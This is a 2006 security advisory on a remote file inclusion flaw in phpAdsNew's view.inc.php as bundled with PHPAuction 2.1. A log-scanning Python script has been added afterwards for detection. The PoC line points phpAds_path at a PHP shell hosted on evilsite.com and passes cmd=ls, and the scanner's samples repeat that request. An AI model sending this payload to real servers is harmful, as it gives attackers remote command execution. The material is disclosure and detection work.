phpauction21.txt

2006-08-17T00:00:00
ID PACKETSTORM:48951
Type packetstorm
Reporter Philipp Niedziela
Modified 2006-08-17T00:00:00

Description

                                        
`+--------------------------------------------------------------------  
+  
+ PHPAuction 2.1 with phpAdsNew 2.0.5 Remote File Inclusion  
+  
+--------------------------------------------------------------------  
+  
+ Affected Software .: PHPAuction 2.1 (maybe higher) with phpAdsNew,  
+ phpAdsNew 2.0.5 (maybe higher)  
+ Vendor ............: http://www.phpauction.net,  
+ http://phpadsnew.com  
+ Class .............: Remote File Inclusion in /phpAdsNew/view.inc.php  
+ Risk ..............: high (Remote File Execution)  
+ Found by ..........: Philipp Niedziela  
+ Original advisory .: http://www.bb-pcsecurity.de/sicherheit_264.htm  
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de  
+  
+--------------------------------------------------------------------  
+  
+ Code /phpAdsNew/view.inc.php:  
+  
+ .....  
+ // Include required files  
+ require ("$phpAds_path/dblib.php");   
+ require ("$phpAds_path/lib-expire.inc.php");  
+ .....  
+  
+--------------------------------------------------------------------  
+  
+ $phpAds_path is not properly sanitized before being used.  
+  
+--------------------------------------------------------------------  
+  
+ Solution:  
+ Declare $phpAds_path before using it.  
+  
+--------------------------------------------------------------------  
+ PoC:  
+ Place a PHPShell on a remote location:  
+ http://evilsite.com/dblib.php/index.html  
+  
+ http://[target]/phpAdsNew/view.inc.php?phpAds_path=http://evilsite.com/dblib.php/&cmd=ls  
+  
+--------------------------------------------------------------------  
+  
+ Greets:  
+ Krini&Lenni  
+  
+-------------------------[ E O F ]----------------------------------  
`
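
A log check for the request pattern this advisory describes, as an added example that is not part of the original advisory or of phpAdsNew: it flags access-log entries for view.inc.php that carry a phpAds_path parameter. The combined log format, the sample entries and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Request target inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that starts with a URL scheme / PHP stream wrapper, "//" or a UNC prefix.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]+:|//|\\\\)', re.I)

def classify(line):
    """Return None, 'param-supplied' or 'remote-include' for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path, _, query = m.group(1).partition("?")
    if not unquote(path).lower().endswith("/view.inc.php"):
        return None
    # parse_qsl percent-decodes names and values, so phpAds%5Fpath is caught too.
    values = [v for k, v in parse_qsl(query, keep_blank_values=True)
              if k == "phpAds_path"]
    if not values:
        return None
    if any(REMOTE_RE.match(v) for v in values):
        return "remote-include"
    # The script should set this variable itself; a client-supplied value is a probe.
    return "param-supplied"

def scan(lines):
    """Return [(line_number, verdict)] for every flagged entry."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict))
    return hits

# Constructed sample entries (documentation addresses and .example hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Aug/2006:10:01:02 +0000] "GET /phpAdsNew/view.inc.php HTTP/1.1" 200 0',
    '198.51.100.7 - - [17/Aug/2006:10:02:11 +0000] "GET /phpAdsNew/view.inc.php?phpAds_path=http://files.example/x/&cmd=ls HTTP/1.1" 200 512',
    '198.51.100.7 - - [17/Aug/2006:10:02:40 +0000] "GET /phpAdsNew/view.inc.php?phpAds%5Fpath=HTTP%3A%2F%2Ffiles.example%2Fx%2F HTTP/1.1" 200 512',
    '198.51.100.9 - - [17/Aug/2006:10:03:05 +0000] "GET /phpAdsNew/view.inc.php?phpAds_path=../includes HTTP/1.1" 500 0',
    '192.0.2.10 - - [17/Aug/2006:10:04:00 +0000] "GET /index.php?phpAds_path=http://files.example/x/ HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(n, verdict)
```

A parameter sent in a POST body or cookie does not appear in an access log, so this covers query-string requests like the one in the PoC only.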